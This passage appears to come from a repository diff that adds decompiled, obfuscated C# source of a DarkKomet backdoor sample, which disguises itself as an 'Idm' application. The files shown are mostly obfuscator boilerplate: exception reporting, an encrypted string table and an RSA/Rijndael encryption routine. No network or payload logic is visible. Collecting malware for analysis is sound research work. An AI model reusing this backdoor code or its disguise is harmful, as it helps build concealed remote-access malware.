throw;
}
}
[DebuggerNonUserCode]
[EditorBrowsable(EditorBrowsableState.Advanced)]
private static void \u0018\u0004(object sender, EventArgs e)
{
bool mySettingsOnExit;
try
{
mySettingsOnExit = \u0094.\u001B\u0003().SaveMySettingsOnExit;
if (!mySettingsOnExit)
return;
// ISSUE: reference to a compiler-generated method
\u001A\u0002.\u007E\u0082((object) \u0001\u0002.\u001A\u0004());
}
catch (Exception ex)
{
// ISSUE: variable of a boxed type
__Boxed<bool> local = (ValueType) mySettingsOnExit;
object obj = sender;
EventArgs eventArgs = e;
\u0089\u0004.\u001A\u0005(ex, (object) local, obj, (object) eventArgs);
throw;
}
}
public static MySettings Default
{
get
{
object obj1;
bool flag;
try
{
flag = !MySettings.\u0002;
if (flag)
{
obj1 = MySettings.\u0003;
\u001A\u0002.\u0005\u0007(obj1);
\u001A\u0002.\u0014\u0004(obj1);
try
{
flag = !MySettings.\u0002;
if (flag)
{
\u0080\u0004.\u007E\u0092\u0006((object) \u0094.\u001B\u0003(), (ShutdownEventHandler) ((sender, e) =>
{
bool mySettingsOnExit;
try
{
mySettingsOnExit = \u0094.\u001B\u0003().SaveMySettingsOnExit;
if (!mySettingsOnExit)
return;
\u001A\u0002.\u007E\u0082((object) \u0001\u0002.\u001A\u0004());
}
catch (Exception ex)
{
__Boxed<bool> local = (ValueType) mySettingsOnExit;
object obj2 = sender;
EventArgs eventArgs = e;
\u0089\u0004.\u001A\u0005(ex, (object) local, obj2, (object) eventArgs);
throw;
}
}));
MySettings.\u0002 = true;
}
}
finally
{
\u001A\u0002.\u0015\u0004(obj1);
}
}
MySettings mySettings1 = MySettings.\u0001;
MySettings mySettings2 = mySettings1;
return mySettings2;
}
catch (Exception ex)
{
MySettings mySettings3;
MySettings mySettings4 = mySettings3;
object obj3 = obj1;
__Boxed<bool> local = (ValueType) flag;
\u0089\u0004.\u001A\u0005(ex, (object) mySettings4, obj3, (object) local);
throw;
}
}
}
}
}
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/SmartAssembly/Attributes/PoweredByAttribute.cs
+27
View File
@@ -0,0 +1,27 @@
// Decompiled with JetBrains decompiler
// Type: SmartAssembly.Attributes.PoweredByAttribute
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using \u007F\u0004;
using System;
namespace SmartAssembly.Attributes
{
public sealed class PoweredByAttribute : Attribute
{
public PoweredByAttribute(string s)
{
try
{
}
catch (Exception ex)
{
string str = s;
\u0089\u0004.\u0019\u0005(ex, (object) this, (object) str);
throw;
}
}
}
}
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/SmartAssembly/SmartExceptionsCore/Resources/current.png
BIN
View File
Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 568 B

MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/SmartAssembly/SmartExceptionsCore/Resources/data.png
BIN
View File
Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 945 B

MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/SmartAssembly/SmartExceptionsCore/Resources/default.ico
BIN
View File
Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 7.1 KiB

MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/SmartAssembly/SmartExceptionsCore/Resources/error.png
BIN
View File
Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 971 B

MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/SmartAssembly/SmartExceptionsCore/Resources/error16.png
BIN
View File
Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 782 B

MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/SmartAssembly/SmartExceptionsCore/Resources/network.png
BIN
View File
Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 7.9 KiB

MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/SmartAssembly/SmartExceptionsCore/Resources/ok.png
BIN
View File
Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 762 B

MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/SmartAssembly/SmartExceptionsCore/Resources/warning16.png
BIN
View File
Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 626 B

MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/SmartAssembly/SmartExceptionsCore/Resources/{logo}.png
BIN
View File
Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 838 B

MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/SmartAssembly/SmartExceptionsCore/SmartStackFrame.cs
+129
View File
@@ -0,0 +1,129 @@
// Decompiled with JetBrains decompiler
// Type: SmartAssembly.SmartExceptionsCore.SmartStackFrame
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using \u0003;
using System;
using System.Runtime.InteropServices;
using System.Runtime.Serialization;
namespace SmartAssembly.SmartExceptionsCore
{
[Serializable]
public class SmartStackFrame : ISerializable
{
public const string NotSerializable = "Non-serializable object's string representation: '{0}'";
public readonly int MethodID;
public readonly object[] Objects;
public readonly int ILOffset;
public readonly int ExceptionStackDepth;
public virtual void GetObjectData([In] SerializationInfo obj0, [In] StreamingContext obj1)
{
obj0.AddValue(\u0002.\u0002\u0002(2144), (object) this.MethodID, typeof (int));
// ISSUE: type reference
\u0001\u0004.\u007E\u008E\u0005((object) obj0, \u0002.\u0002\u0002(2181), (object) this.ILOffset, \u0082\u0003.\u008C\u0003(__typeref (int)));
// ISSUE: type reference
\u0001\u0004.\u007E\u008E\u0005((object) obj0, \u0002.\u0002\u0002(2218), (object) this.ExceptionStackDepth, \u0082\u0003.\u008C\u0003(__typeref (int)));
int num1 = this.Objects == null ? 0 : this.Objects.Length;
if (true)
goto label_8;
label_1:
int num2;
// ISSUE: type reference
\u0001\u0004.\u007E\u008E\u0005((object) obj0, \u0002.\u0002\u0002(2271), (object) num2, \u0082\u0003.\u008C\u0003(__typeref (int)));
if (true)
goto label_9;
label_7:
int index;
for (; index < num2; ++index)
{
string str1 = \u0097\u0002.\u001B\u0002(\u0002.\u0002\u0002(2316), (object) index);
if (true)
goto label_10;
label_4:
string str2;
try
{
SmartStackFrame.\u0006\u0002(obj0, str2, this.Objects[index]);
continue;
}
catch (Exception ex)
{
object obj = (object) \u0002.\u0002\u0002(2361);
SmartStackFrame.\u0006\u0002(obj0, str2, obj);
continue;
}
label_10:
str2 = str1;
goto label_4;
}
return;
label_9:
index = 0;
goto label_7;
label_8:
num2 = num1;
goto label_1;
}
private static void \u0006\u0002([In] SerializationInfo obj0, [In] string obj1, [In] object obj2)
{
try
{
if (obj2.GetType().IsSerializable)
goto label_3;
label_2:
obj2 = (object) \u0097\u0002.\u001B\u0002(\u0002.\u0002\u0002(2462), obj2);
label_3:
if (true)
{
// ISSUE: type reference
\u0001\u0004.\u007E\u008E\u0005((object) obj0, obj1, obj2, \u0082\u0003.\u008C\u0003(__typeref (object)));
}
else
goto label_2;
}
catch (SerializationException ex)
{
do
{
// ISSUE: type reference
\u0001\u0004.\u007E\u008E\u0005((object) obj0, obj1, (object) \u0097\u0002.\u001B\u0002(\u0002.\u0002\u0002(2462), obj2), \u0082\u0003.\u008C\u0003(__typeref (object)));
}
while (false);
}
}
internal SmartStackFrame([In] SerializationInfo obj0, [In] StreamingContext obj1)
{
this.MethodID = \u0095\u0002.\u007E\u0090\u0005((object) obj0, \u0002.\u0002\u0002(2144));
this.ILOffset = \u0095\u0002.\u007E\u0090\u0005((object) obj0, \u0002.\u0002\u0002(2181));
this.ExceptionStackDepth = \u0095\u0002.\u007E\u0090\u0005((object) obj0, \u0002.\u0002\u0002(2218));
int length = \u0095\u0002.\u007E\u0090\u0005((object) obj0, \u0002.\u0002\u0002(2271));
this.Objects = new object[length];
for (int index = 0; index < length; ++index)
{
try
{
// ISSUE: type reference
this.Objects[index] = \u0002\u0004.\u007E\u008F\u0005((object) obj0, \u0097\u0002.\u001B\u0002(\u0002.\u0002\u0002(2316), (object) index), \u0082\u0003.\u008C\u0003(__typeref (object)));
}
catch (Exception ex)
{
this.Objects[index] = (object) \u0002.\u0002\u0002(2535);
}
}
}
internal SmartStackFrame([In] int obj0, [In] object[] obj1, [In] int obj2, [In] int obj3)
{
this.MethodID = obj0;
this.ExceptionStackDepth = obj3;
this.ILOffset = obj2;
this.Objects = obj1;
}
}
}
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0001_0003.cs
+10
View File
@@ -0,0 +1,10 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System.Runtime.InteropServices;
using System.Text;
internal delegate StringBuilder \u0001\u0003([In] object obj0, [In] object obj1);
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0001_0004.cs
+10
View File
@@ -0,0 +1,10 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System;
using System.Runtime.InteropServices;
internal delegate void \u0001\u0004([In] object obj0, [In] string obj1, [In] object obj2, [In] Type obj3);
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0002_0003.cs
+10
View File
@@ -0,0 +1,10 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System.Collections;
using System.Runtime.InteropServices;
internal delegate IDictionary \u0002\u0003([In] object obj0);
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0002_0004.cs
+10
View File
@@ -0,0 +1,10 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System;
using System.Runtime.InteropServices;
internal delegate object \u0002\u0004([In] object obj0, [In] string obj1, [In] Type obj2);
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0003/_0002.cs
+142
View File
@@ -0,0 +1,142 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using \u0003;
using \u007F\u0004;
using System;
using System.Collections;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
namespace \u0003
{
internal class \u0002
{
private static string \u0001;
private static string \u0002;
private static byte[] \u0003;
private static Hashtable \u0004;
private static bool \u0005;
private static int \u0006;
public static string \u0002\u0002([In] int obj0)
{
string str1;
int num1;
int num2;
int num3;
byte[] numArray1;
string str2;
try
{
obj0 -= \u0002.\u0006;
if (\u0002.\u0005)
{
str1 = (string) \u0002.\u0004[(object) obj0];
if (str1 != null)
return str1;
}
num1 = 0;
num2 = obj0;
num3 = (int) \u0002.\u0003[num2++];
if ((num3 & 128) == 0)
{
num1 = num3;
if (num1 == 0)
return string.Empty;
}
else
num1 = (num3 & 64) != 0 ? ((num3 & 31) << 24) + ((int) \u0002.\u0003[num2++] << 16) + ((int) \u0002.\u0003[num2++] << 8) + (int) \u0002.\u0003[num2++] : ((num3 & 63) << 8) + (int) \u0002.\u0003[num2++];
string str3;
try
{
numArray1 = \u0016\u0003.\u0010\u0003(\u0006\u0004.\u007E\u0095\u0005((object) \u0003\u0004.\u0096\u0005(), \u0002.\u0003, num2, num1));
str2 = \u009C\u0002.\u007F\u0002(\u0006\u0004.\u007E\u0095\u0005((object) \u0003\u0004.\u0096\u0005(), numArray1, 0, numArray1.Length));
if (\u0002.\u0005)
{
try
{
\u008B\u0003.\u007E\u001C\u0004((object) \u0002.\u0004, (object) obj0, (object) str2);
}
catch
{
}
}
str3 = str2;
}
catch
{
str3 = (string) null;
}
return str3;
}
catch (Exception ex)
{
string str4 = str1;
// ISSUE: variable of a boxed type
__Boxed<int> local1 = (ValueType) num1;
// ISSUE: variable of a boxed type
__Boxed<int> local2 = (ValueType) num2;
// ISSUE: variable of a boxed type
__Boxed<int> local3 = (ValueType) num3;
byte[] numArray2 = numArray1;
string str5 = str2;
string str6;
string str7 = str6;
// ISSUE: variable of a boxed type
__Boxed<int> local4 = (ValueType) obj0;
\u0089\u0004.\u001F\u0005(ex, (object) str4, (object) local1, (object) local2, (object) local3, (object) numArray2, (object) str5, (object) str7, (object) local4);
throw;
}
}
static \u0002()
{
Assembly assembly1;
Stream stream1;
int length;
try
{
\u0002.\u0001 = "0";
\u0002.\u0002 = "74";
\u0002.\u0003 = (byte[]) null;
\u0002.\u0004 = (Hashtable) null;
\u0002.\u0005 = false;
\u0002.\u0006 = 0;
if (\u0002.\u0001 == "1")
{
\u0002.\u0005 = true;
\u0002.\u0004 = new Hashtable();
}
\u0002.\u0006 = Convert.ToInt32(\u0002.\u0002);
assembly1 = \u0098\u0003.\u0010\u0005();
stream1 = \u0093\u0003.\u007E\u0004\u0005((object) assembly1, "{8a2cc06e-b699-4a98-98ee-08831fc9c995}");
try
{
length = \u0013\u0003.\u0008\u0003(\u000F\u0004.\u007E\u009F\u0005((object) stream1));
\u0002.\u0003 = new byte[(int) checked ((uint) length)];
int num = \u0012\u0004.\u007E\u0006\u0006((object) stream1, \u0002.\u0003, 0, length);
\u001A\u0002.\u007E\u0003\u0006((object) stream1);
}
finally
{
if (stream1 != null)
\u001A\u0002.\u007E\u0004\u0002((object) stream1);
}
}
catch (Exception ex)
{
Assembly assembly2 = assembly1;
Stream stream2 = stream1;
// ISSUE: variable of a boxed type
__Boxed<int> local = (ValueType) length;
\u0089\u0004.\u001A\u0005(ex, (object) assembly2, (object) stream2, (object) local);
throw;
}
}
}
}
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0003_0003.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System;
internal delegate DateTime \u0003\u0003();
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0003_0004.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System.Text;
internal delegate Encoding \u0003\u0004();
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0004_0003.cs
+10
View File
@@ -0,0 +1,10 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System;
using System.Runtime.InteropServices;
internal delegate Delegate \u0004\u0003([In] Delegate obj0, [In] Delegate obj1);
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0004_0004.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System.Runtime.InteropServices;
internal delegate byte[] \u0004\u0004([In] object obj0, [In] string obj1);
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0005_0003.cs
+11
View File
@@ -0,0 +1,11 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System;
using System.Reflection;
using System.Runtime.InteropServices;
internal delegate Delegate \u0005\u0003([In] Type obj0, [In] MethodInfo obj1);
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0005_0004.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System.Runtime.InteropServices;
internal delegate string \u0005\u0004([In] object obj0, [In] byte[] obj1);
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0006_0002/_0006_0002.cs
+2195
View File
File diff suppressed because it is too large Load Diff
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0006_0002/_0008.cs
+147
View File
@@ -0,0 +1,147 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using \u0003;
using \u0006\u0002;
using System;
using System.IO;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
namespace \u0006\u0002
{
internal class \u0008
{
public static string \u0001;
public static byte[] \u0006\u0002([In] byte[] obj0, [In] string obj1)
{
if (obj1.StartsWith(\u0002.\u0002\u0002(189)))
{
\u0008.\u0001 = \u0002.\u0002\u0002(194);
return (byte[]) null;
}
if (true)
goto label_31;
label_3:
if (true)
goto label_32;
label_4:
MemoryStream memoryStream;
do
{
if (true)
goto label_33;
label_5:
continue;
label_33:
memoryStream = (MemoryStream) null;
goto label_5;
}
while (false);
if (true)
goto label_34;
label_7:
RSACryptoServiceProvider cryptoServiceProvider1;
RijndaelManaged rijndaelManaged1;
CryptoStream cryptoStream;
try
{
if (true)
goto label_18;
label_15:
\u001A\u0002.\u007E\u0087\u0006((object) cryptoStream);
return \u0099\u0003.\u007E\u0014\u0006((object) memoryStream);
label_18:
RijndaelManaged rijndaelManaged2 = new RijndaelManaged();
if (true)
goto label_16;
label_8:
RSACryptoServiceProvider cryptoServiceProvider2 = new RSACryptoServiceProvider();
if (true)
goto label_17;
label_9:
\u001B\u0002.\u007E\u0084\u0006((object) cryptoServiceProvider1, obj1);
\u001A\u0002.\u007E\u008C\u0006((object) rijndaelManaged1);
\u001A\u0002.\u007E\u008D\u0006((object) rijndaelManaged1);
byte[] numArray1 = new byte[48];
\u0088\u0002.\u0004\u0003((Array) \u0099\u0003.\u007E\u008A\u0006((object) rijndaelManaged1), 0, (Array) numArray1, 0, 32);
\u0088\u0002.\u0004\u0003((Array) \u0099\u0003.\u007E\u0089\u0006((object) rijndaelManaged1), 0, (Array) numArray1, 32, 16);
memoryStream = new MemoryStream();
try
{
byte[] numArray2 = \u007F\u0004.\u007E\u008F\u0006((object) cryptoServiceProvider1, numArray1, false);
\u0014\u0004.\u007E\u000E\u0006((object) memoryStream, (byte) 1);
\u0014\u0004.\u007E\u000E\u0006((object) memoryStream, \u0012\u0003.\u0007\u0003(numArray2.Length / 8));
\u0013\u0004.\u007E\u0008\u0006((object) memoryStream, numArray2, 0, numArray2.Length);
}
catch (CryptographicException ex1)
{
try
{
byte[] numArray3 = new byte[16];
byte[] numArray4 = new byte[16];
\u0088\u0002.\u0004\u0003((Array) \u0099\u0003.\u007E\u008A\u0006((object) rijndaelManaged1), 0, (Array) numArray3, 0, 16);
\u0088\u0002.\u0004\u0003((Array) \u0099\u0003.\u007E\u008A\u0006((object) rijndaelManaged1), 16, (Array) numArray4, 0, 16);
byte[] numArray5 = \u007F\u0004.\u007E\u008F\u0006((object) cryptoServiceProvider1, numArray3, false);
byte[] numArray6 = \u007F\u0004.\u007E\u008F\u0006((object) cryptoServiceProvider1, numArray4, false);
byte[] numArray7 = \u007F\u0004.\u007E\u008F\u0006((object) cryptoServiceProvider1, \u0099\u0003.\u007E\u0089\u0006((object) rijndaelManaged1), false);
\u0014\u0004.\u007E\u000E\u0006((object) memoryStream, (byte) 2);
\u0014\u0004.\u007E\u000E\u0006((object) memoryStream, \u0012\u0003.\u0007\u0003(numArray5.Length / 8));
\u0013\u0004.\u007E\u0008\u0006((object) memoryStream, numArray5, 0, numArray5.Length);
\u0013\u0004.\u007E\u0008\u0006((object) memoryStream, numArray6, 0, numArray6.Length);
\u0013\u0004.\u007E\u0008\u0006((object) memoryStream, numArray7, 0, numArray7.Length);
}
catch (CryptographicException ex2)
{
\u0008.\u0001 = \u0002.\u0002\u0002(287);
return (byte[]) null;
}
}
cryptoStream = new CryptoStream((Stream) memoryStream, \u001F\u0004.\u007E\u008B\u0006((object) rijndaelManaged1), CryptoStreamMode.Write);
\u0013\u0004.\u007E\u0008\u0006((object) cryptoStream, obj0, 0, obj0.Length);
goto label_15;
label_17:
cryptoServiceProvider1 = cryptoServiceProvider2;
goto label_9;
label_16:
rijndaelManaged1 = rijndaelManaged2;
goto label_8;
}
catch (Exception ex)
{
\u0008.\u0001 = \u009A\u0002.\u001E\u0002(\u0002.\u0002\u0002(493), \u0082\u0002.\u007E\u0086\u0002((object) ex));
return (byte[]) null;
}
finally
{
if (rijndaelManaged1 != null)
\u001A\u0002.\u007E\u0088\u0006((object) rijndaelManaged1);
if (cryptoServiceProvider1 != null)
\u001A\u0002.\u007E\u0083\u0006((object) cryptoServiceProvider1);
if (true)
{
if (memoryStream != null)
\u001A\u0002.\u007E\u0003\u0006((object) memoryStream);
if (cryptoStream == null)
goto label_30;
}
if (true)
\u001A\u0002.\u007E\u0003\u0006((object) cryptoStream);
label_30:;
}
label_34:
cryptoStream = (CryptoStream) null;
goto label_7;
label_32:
cryptoServiceProvider1 = (RSACryptoServiceProvider) null;
goto label_4;
label_31:
rijndaelManaged1 = (RijndaelManaged) null;
goto label_3;
}
}
}
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0006_0002/_001E_0004.cs
+38
View File
@@ -0,0 +1,38 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
namespace \u0006\u0002
{
internal class \u001E\u0004
{
private readonly Type \u0001;
private readonly object \u0002;
private readonly bool \u0003;
public \u001E\u0004([In] object obj0, [In] bool obj1)
: this(obj0, obj0?.GetType(), obj1)
{
}
public \u001E\u0004([In] object obj0, [In] Type obj1, [In] bool obj2)
{
this.\u0002 = obj0;
this.\u0001 = obj1;
this.\u0003 = obj2;
}
[SpecialName]
public bool \u0006\u0002() => this.\u0003;
public object \u0006\u0002() => this.\u0002;
public Type \u0006\u0002() => this.\u0001;
}
}
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0006_0003.cs
+10
View File
@@ -0,0 +1,10 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System;
using System.Runtime.InteropServices;
internal delegate object \u0006\u0003([In] Type obj0);
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0006_0004.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Idm, Version=6.5.8.1, Culture=neutral, PublicKeyToken=null
// MVID: 8A2CC06E-B699-4A98-98EE-08831FC9C995
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3.exe
using System.Runtime.InteropServices;
internal delegate string \u0006\u0004([In] object obj0, [In] byte[] obj1, [In] int obj2, [In] int obj3);
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.gwon-35b4a84324681a1000c14cf114b6f94ada34eb6c6ca38b9a4584b31e742aece3/_0007/_0006.cs
+246
View File
@@ -0,0 +1,246 @@
